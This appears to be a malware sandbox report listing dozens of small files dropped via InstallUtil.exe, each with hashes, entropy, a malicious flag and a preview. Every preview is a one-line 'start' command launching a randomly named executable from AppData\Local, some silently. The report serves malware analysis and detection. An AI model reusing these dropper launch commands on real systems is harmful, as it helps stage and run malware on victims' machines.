SHA-512:EC1AF705FF2744B3766F33CCBE93FDC8EFAB088F29257CCF2C38DEB2E42468F5C923B731DE3E9D8ED0BC64F624EEB4381C7037295E1DA90CD5FD772A373054D6
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\ynI9MlCoK2uCu7iRPFKyVbhb.exe"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.926187924989845
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5SyfuPP6X2L/kdan:fE1wkn23SyoiXOD
MD5:B88F7F3FBFC6CC715BC3B223D613A2BC
SHA1:F3377035DD1E1958CE6A7D152C3019E9B77C4992
SHA-256:E074D0FAB7C45633187BA9FF16FCD5743E7D8E3E1B8F25BDFC99D6DEB86F619A
SHA-512:EF821E818658D0BC9795655C608ED24649B889F1FD9A46ECC943A860369C35C3FEE3181EC5A28AE8A2BBA07B23F8CB7969B38281B9C8613DF746290DE019F6D4
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\wY4rC1FxrpCjj3T82kMrcxVU.exe" --silent --allusers=0
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.782670203801878
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5VdHqjx22MtYNHFn:fE1wkn233KjMYNl
                                                                                                                                                                                                                                MD5:52CF1EF997EC58F90901E251D3120BF8
                                                                                                                                                                                                                                SHA1:A013540B429C17553E97F1DC062E57E7049DD825
                                                                                                                                                                                                                                SHA-256:89175362078274595D1ED1BF9C40E6526ABF0DCCB294B98CBB6916A9A0F3DCAA
                                                                                                                                                                                                                                SHA-512:C43AD55A41FB56D8FD82AE82498F6687E9B8592BE8B732AB3C29DF9283E5260852E6D8A86E95BF3068311BF838BC743CB18E6AE6EDE3B5BF19E853C144A5C692
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\pxXbxOFPbFSHTNbciHYCsLtx.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.985568754526514
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5DWnzS/3oqQXPLJFn:fE1wkn23z/3oqQXPn
                                                                                                                                                                                                                                MD5:C2FF8DB89D340944B05E5548545BFBBA
                                                                                                                                                                                                                                SHA1:D6964E8143E70904B836602E33E719C6DE05DCA7
                                                                                                                                                                                                                                SHA-256:A391B93A90EFF36B0F7C040A435C4A45BF7FEE4EE25A822004A5416C69B18111
                                                                                                                                                                                                                                SHA-512:20293AA6F597B59700D7BBBBF3D0EE850C4664F4124F9B8FDAF5476EA1F4B9A898E560C32EFE566833607BE47C420D4537BA8998597FFEC46DA331898AA339DA
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\f3jz5WVmWaBPPPREHO52FM3n.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.926150414379995
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5xwCBE/2ch0RFCln:fE1wkn23lBEjeFs
                                                                                                                                                                                                                                MD5:0661ACFD7BE23B40EB390996C9CEDFE8
                                                                                                                                                                                                                                SHA1:CD99F459D67FEC9AA98E658587DCEA0242FCF4B9
                                                                                                                                                                                                                                SHA-256:EB6A54D83E4143829F528E7B1EA0698D9ED6146705A2AAA3D73CD43893AEE72A
                                                                                                                                                                                                                                SHA-512:37CC7E4DBD82CD7550C128313190F126C8837B320A0DF614C774340FA9057C833E2359747F9B8D42397AD45C885925DAF138BDD7DA1B78802DB656719DD7B5E7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\TUgcsAhZj9KS9L7Y6WBtONe5.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.905716942869603
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5TfQCGL8VIxZl:fE1wkn238Cc86vl
                                                                                                                                                                                                                                MD5:E5CE2E7EABB36FE0B72459B0695BAE3E
                                                                                                                                                                                                                                SHA1:FD2B98958CCB9DE5ED3C75D7E5449A5BD3D372B6
                                                                                                                                                                                                                                SHA-256:8073ECAE41069062983F947D32AE4B12D943C77D5B3C20123A56460CB407DE6B
                                                                                                                                                                                                                                SHA-512:972B6543E6E3FEE8B631DEBAB1E229008D699A43F46B07E15E2B87250611393AF6DE6AB1D83A937D0505411AF2DC2A509C4EC3D90C6073284E3CC2C7B90E7CC2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\6ZqpY056kcnYDSL39QayoHTr.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.926150414379995
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5/CVsTdmldiF:fE1wkn23qVsT2EF
                                                                                                                                                                                                                                MD5:86D3FF075FC960E1554A6B7CF905DAA1
                                                                                                                                                                                                                                SHA1:0F756EEE65D0ED4A28B3DD371096B7FC7FE8874F
                                                                                                                                                                                                                                SHA-256:02EC46F9BCF49801AD6445DCD17820D75ED19B429EB947100E7080902F1AD8F5
                                                                                                                                                                                                                                SHA-512:8191FC9BD5CB5E15CB0D45FCDE62437DF0B5BDA3CF0BE899508F57C722F4A6BDEE8E0CF8076750695586A886BFB6D4A686BC89A4B42359F35D64B1978B7FF7A3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ZNUkdRLikcOE0I8txHta42nK.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.985568754526515
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5E3rNJXdQf0CHFn:fE1wkn23EbNJtQf0CHF
                                                                                                                                                                                                                                MD5:FB5EF48EB84DDB420355A97D161C1557
                                                                                                                                                                                                                                SHA1:484B5D031A10AE375E1345F684D8674AEC5FE991
                                                                                                                                                                                                                                SHA-256:C2C7D7102B962E37866E9E3910C8DB944ED980D1E6248FB8E1DEEDC78400152E
                                                                                                                                                                                                                                SHA-512:46AFF9148C7B0C7F41F2471D37AD73F4A0099C8C24239CF9FEBA26533C7A61AE5F0E5C81D7ED62A520B4053BB3247CE38B2D71D516886364A2AAA18D8B8808B7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\aRNQGQYPdgEPyk2wKE0Y2RBY.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.818760421130472
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J58vvHLiv:fE1wkn238HH+v
                                                                                                                                                                                                                                MD5:C54ED1F21B3008ADB614F1A601B786EF
                                                                                                                                                                                                                                SHA1:28F83FFA703195B1CB2826C9BA7E58EF3A888129
                                                                                                                                                                                                                                SHA-256:A009575E441443446E1F5043F2D2F5C354EA54AD969145B3C202A7C7AE4B4917
                                                                                                                                                                                                                                SHA-512:44E90E74666FF4B5E9034487925A6A61D280898B15684AC1B3D7EAE05D9BB756B8DD2B76B7AA806371B053BBCB563932A9C727DCD036547FD393CD8196DE1DE8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Ydv77irsMwFsUh797bOnhxVa.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.945642848698058
                                                                                                                                                                                                                                Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5r9Ejec3l3:fE1wkn23ZKD3V
MD5:B2FEDA86E17E41D574D6B8E6493B4D63
SHA1:70B8EE450CCCCF905A3EFBEA420354F9EC4C994D
SHA-256:3F43AFE80431F0A7F6E14223B145A9F962E51D2EF16756631283524DE7EF48C8
SHA-512:D17518786AC8D98712179D5C6C8EEBCA38F4C7F8157E8C7A0A7F73CBD9D97868A4B69A33452D817E6BE665E92E99008D1F1A19B7A2901B1C46390A2F31C70B15
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\NZM2kE4xFO5iDsk9Rikx4C6y.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.820207746784238
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5soicg79BCHFn:fE1wkn23sT3BCl
MD5:1327DE24D0F734A926B61F60FD164A87
SHA1:6DA071A7549C2717F775113C5D8F146952EAB743
SHA-256:4DF36D78CE7DB25F513CD596375A1CA80EB9E4FFB16CAE57A47494AA365AD056
SHA-512:622ADD23F1F46DFD36C9CD71C8FDAEC17B193DDFB4919CE251B80803FD603DF4E3A74A1F6DB3E1260B02E47982DBBB6E06D8D03E4B16E06CF0007C8D156B6686
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\I6q6xa8OpNqFa1GE2NL68OxV.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.871448421469599
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5fMKdZmMGWIkm:fE1wkn230Kd8H8m
MD5:2A64110A3AD0E947E6962632F421791D
SHA1:DDA77A4F955C2AA13A9E4DEDF9D7185F08B096D3
SHA-256:8633AF777CF4BB3DF622A676B153766175B076C5B4AECF29C4ED1EC773ABF9CF
SHA-512:24B5672917272F2524A7540AB4F738C7F0467E74C39C73F82247C97DD9538B1848BA1DD9F1D9D022B2BBDF7CF6E7A37DC9D587CECA9A188F7642A325D72C1ED8
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\zpUboT49MR3eAuGylrU8kcsm.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.929045065687527
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5SGoKHLLKG:fE1wkn23SGokP3
MD5:ADFEF4C4069AE42473AE7A175FD23369
SHA1:DEC7BFAC94DE4322D1AE76EB34D2027A5FA5F5B4
SHA-256:1B6A7EF26F0C1BDB4AD76D2DAFAF3E0D65C7261ECC1854EB7B07C764673CF8C5
SHA-512:5FA18D7D1CCBE09D5F8CFDFF360BDC289BBAFE44C4B4F8F45C71ADE1ADB0F75AABB416C438AE2CEC14DE37A06C71D633A081436098182654F3C1DAEEDB297968
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\7cpaa9oydWlSDG3uNiB45oQF.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.909552631369464
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5UbJb6TVYVLNHFn:fE1wkn23UbN6OVLNHF
MD5:D19440F69B93549585F43D7F91ABDA0B
SHA1:D055E21A4C61BE3E5B2FBC913C5E2D97735B643A
SHA-256:D416BE95BEE9AD2CA366C342F2F5E06A263E4BE12563115C43C5E1489D01B23A
SHA-512:9C0B01DFE439F701186BBBCF22572517B43D654172525DFB250B8189B00C18C30420F093E044700AD01AC00E872E4206B5A7D5188B6E313FFC6D03C70C1FBF95
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\qfp0lXmf35DYe7EpAYkTc2V7.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.944195523044292
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5SpWtxXrm:fE1wkn23SpoQ
MD5:2C10A6A9CD59A2111A3533FFD767D4DA
SHA1:98ADB6C288126758B5D12E742ABC8499A141EC09
SHA-256:9A07773DED130AC813081BA0319670AD47C9BDA2F46E81651498321C49204D7E
SHA-512:ABEE6A72F231FDA5F17D909064C67D095D3BD847117D6161A448E5BBE98849C252FFB1C0E42FC9F7413A112201D4093B9C0189EAE8706D71AFAE96314B3C22B1
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\7Ze1sBHT2zACLNmQRZlcE3Tf.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.978838414719121
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J51Qq2pUiF:fE1wkn23hW
MD5:D58F9F23402F60166F2B01399F04A333
SHA1:B6CDECBB554A904B0F6CBB454B2A10A85A816BE0
SHA-256:7B550F598E0718A6B8747C46E223F5292CA276D334FAA3F7746F110F5E65B65E
SHA-512:6548517D2AF09D8FC7FBAD3C2878EDBB8BE98B493C4C9FCD8FF387F4EBE7EFD03629621FCE076542AF7B8362EA27E3F1BD78CCCE68423F501474FE80E516A51E
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\PuOhjWfV8sy4waUuI70BLeKF.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.982425635974515
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5vQwVcm4xSkdan:fE1wkn23Ywim4kD
MD5:ED5ECDBA321A551EE5A29665BB363443
SHA1:F986E0DC154DC50AAF53B2F037BB8BB285E52F5D
SHA-256:E0DBA223AD64430D4F67CD3CE9B583D1CBDAD1ACCEA9EBAA7B34CAE9FBF18F6D
SHA-512:826FBA1A91CB3AC36C5C4F9F242CA0D06ED14AD6795933762D0E285EEF04181881E5D9E5439C96E2DB8721B909578FFD71EF1AF0FDFC0EEDDDFC16169BE1DF14
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\JqI9qtwrsBIQ597pcbH2GGod.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):5.0402397306175155
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5SPUQzse2diykdan:fE1wkn23SQe6/D
MD5:BFFF005D4ABF1440B77BEEE1E1FB69CE
SHA1:6256B56CB6D6ED7CECF3AE2565F9FD5131A8C37E
SHA-256:D6C84097EB3003F959A7073AC63330E48A9E73F620115D999620D1095D0C07F6
SHA-512:EF1BE587E2E18539D6E7F68EB6235AA31BB44A1F25C8F503D3B8E676C0E83180EA5A4FE914E590B833A185AF8438256CB40A1694CA0B4199DC26CC78D6E55C1D
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\7j7a6Y5ZdE9mwtxTh84g5rxP.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.858686326958928
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5DTkqQvn:fE1wkn23Pkb
MD5:85148ADBD389BB05F8E32C9198FEF5C1
SHA1:8C58DC6A56086128583367A7C412FF57DB45EDB0
SHA-256:15C48021F5A8F5F7D76783CAF03EA606060A369809BB788CAC32E30A7B37BB55
SHA-512:DC7F51EA35E794F7A9EB28E54760B76015CC854D94F28C84ED170A4229B20ACB73390626BC5A499694C6BACEF1403018F672F5C373896318B58358096A4C1F26
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\f6TPmOqJ9OCeCveaR02i6cCx.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.904269617215838
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J52ScSADVwR5Nln:fE1wkn232SjADCR5Nl
                                                                                                                                                                                                                                MD5:C991F52C9B3A8927F0F42F51B79DAF8A
                                                                                                                                                                                                                                SHA1:F5389DF9BE3311344524AB4633D6D3653A138EA9
                                                                                                                                                                                                                                SHA-256:4E4E2066BC5BACE37220951548E82ED7F772E00B32AD16CC1E1EB9E898C4DD28
                                                                                                                                                                                                                                SHA-512:A13FDC976275700771AD189FADCAA230C09CA1131543B5D2F75C630576AB4A7A7CB2FD994C5A46D0FD0FA3A59FDB1B80CD39305EC0E74CCF7AB80C8FCB10FBA6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\SwLW7tCu3MPLSebktZR0Do4H.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.824417805558924
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Hic+HkfL4AHF:fE1wkn23CBYL4iF
                                                                                                                                                                                                                                MD5:2A2B8C46D0BEEEF53073577F7757C131
                                                                                                                                                                                                                                SHA1:FDF7CF43A87B94588DD40C4C9375C77D34289FC8
                                                                                                                                                                                                                                SHA-256:04CE8CDA215BB2D08D3BEF2F11B1F31AA0A50509C5F53DED7A2734B04429E38D
                                                                                                                                                                                                                                SHA-512:B8258212FC41EC6E9BFE81198D21EFD263D9B93DD10BECACEF64C08185F5A9FC747250AE0846892732C5FF32438385710E5AB887E49E03969D1F92364B5A8253
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\bl0crpfxei2USVRb4JVAGKoa.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.900059558441151
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5CdTDWkpK:fE1wkn23Cd0
                                                                                                                                                                                                                                MD5:F585AC951F538B0498860CECDC4D1C1F
                                                                                                                                                                                                                                SHA1:3E61BF0B7006A4A88D0426E824CD486A16C52F7B
                                                                                                                                                                                                                                SHA-256:451B2146104C080B6B6EB1BE31F7D8248AC2108F1C16F387679774367A1457A4
                                                                                                                                                                                                                                SHA-512:789F1BC9A645535FAE7A583E74E9EDCA491AD12D37A79BE1FB784ADBC0B7CCCCBED820C3430B85B7A486B78B2A6F080AFCF7D6D04329CF0578267EC98402B864
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\gxzwlUCvc5fJHx9HWi3ALHoN.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.926150414379996
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5R02utQcaEF:fE1wkn23Fu2caEF
                                                                                                                                                                                                                                MD5:1A7B9B65CC960C80538CA76E00043B71
                                                                                                                                                                                                                                SHA1:A7AC118BCAA026E271E1C11E4110C8AD1327192E
                                                                                                                                                                                                                                SHA-256:8A24816CBA722FC8A9D27024B49E97C3735DA22172A808EABCB9E9C29E982105
                                                                                                                                                                                                                                SHA-512:DCE4BA7A438A538EF4067394BED4E14053299EECBE09196000F62F4F4F23A7018155070D9BDFF2B478F481A67FD9EE3B98823C2E8DBB0568BF6F59A61FF276DB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\tQS97uWWtHJ2H92y7dke3VAE.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.868179399887242
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5OCTRwMFMJ1F:fE1wkn23OQR/+P
                                                                                                                                                                                                                                MD5:384806EC4C355A8AEFF7410C4F117324
                                                                                                                                                                                                                                SHA1:E33B33969537B7ABE094B502BD63ECBE452BA360
                                                                                                                                                                                                                                SHA-256:445BF8872FD7AA488E3BE3D79A8769405D851B4B766088449171C8DF4142CD53
                                                                                                                                                                                                                                SHA-512:B1EF417F18B68B37E089AE797F7F1338D3EEE1E2A04EAC8CE391284BE11B14B7DE66CAE46EE7EFC68681DB513750D1B00E9C6B477324CFD8C92D5E4DB2912606
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\kO0savj64UXXAiEut7imvfm6.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.901924385998554
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5WE8nGdJSkdan:fE1wkn23WHD
                                                                                                                                                                                                                                MD5:17DFD507462F8EF632B7A0A1FBD372F5
                                                                                                                                                                                                                                SHA1:E3B717B64CFB3308C66BDB7CA9A570B35DF67BCE
                                                                                                                                                                                                                                SHA-256:9B5BCB13A32C7DE6061945A37C42B8E7A25F378C606E6AF75C0306CF882C00A9
                                                                                                                                                                                                                                SHA-512:7C1D4D351933FA5656374C5492B37CA0ED1B43016ADCDF783FAE6E93B7DAC6A03A90DCCB44DFEF712AB6702D786AF0E8BE432B32313CCAC7929C4B59843D95E5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3TgecgfsPBFevp0C7lLcJJOk.exe" --silent --allusers=0
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.950925862851686
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J59GlDh1RLcS:fE1wkn234DxcS
                                                                                                                                                                                                                                MD5:F362EB6992C0A93078B2E66625A9FA0B
                                                                                                                                                                                                                                SHA1:2C9D2FD1484DDA3CDDCA6244B3DF73D16CFC047F
                                                                                                                                                                                                                                SHA-256:8376E9C3EECA08D28D555EF663B2A41914CD85E492D042EA7F32E3EA22E944AD
                                                                                                                                                                                                                                SHA-512:E1FE507EC3FE699D138E0C950C4CFC10612D8E54DCBCDA97E2286A9D56B2F9B1B6E92128A150ABB76DBEA704BD496FAC5B10D3339DEC93FDA12D0C92566B60A0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\XcjiyfDAp1xg32d0IyIg2zMk.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.887492604855811
                                                                                                                                                                                                                                Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5pkURuRb6ykdan:fE1wkn2310Rb6yD
MD5:D2D3F4E88727A209BFCE41BE178F17EC
SHA1:6DFF831DC4C132FE50B4E32CE0105B60F3D53078
SHA-256:131BD0DE81030219847FB79C689B733452EE4177F1C52B67FA18079ABF115405
SHA-512:409FD5B2324A9451CCA05D9F45DD01B515D54B865018CDDE521C93F83D081E74E0514676DBDCFC0C278057272B32423A0A082F361AC8898E95E9D16425AB7CF3
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\LAuOzs2TVXyzss3wQ1slqfrw.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.824417805558926
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5NMPPbctWmLZl:fE1wkn23U0Zl
MD5:82500D66B99D57993D6F5B86FD949DE4
SHA1:057D5D6B5385A9F43BA6F92F47FD2BC4FB445F43
SHA-256:B1EFD4B709B1AAECB4B8C5F16FC553C21727450C38EF7F97E5F4DFEAB4A6C33C
SHA-512:2DC228D1BBD32D80B7349B473DF1FCD0BFBD0F30DC3E0A42A41496E4FB8DBD7DF9941B49AC5499BD1DF57A9DCF8E673A11082CD45A3C116110C8D908639959A3
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\hi1kLmvmLjmGV9XJZsoarSnr.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.934575563902772
Encrypted:false
SSDEEP:3:Ljn9m1t+kiE2J5faT8Vrj5q4AlIkdan:fE1wkn23DVU4/D
MD5:3B3B57A16EC3BA64E9F22BAFDBE44BB8
SHA1:F8C3D5B1D58FEB4B88D8794518B3F9F7A9E6212F
SHA-256:A0DAFD92F44BA74961752D062B58DCC9F991DC3960B0C9E128ACD2D64B76C6AB
SHA-512:564B18FBF8F9113B83FECCE38233F1873F88FAC057FA0C280C2137942B908F9B44339C57D560F4684A62B8422ED94871E893D436776F3B9C1AA668B725300F98
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\zCH6Ixp4hDhbc4JHLXEIat9x.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
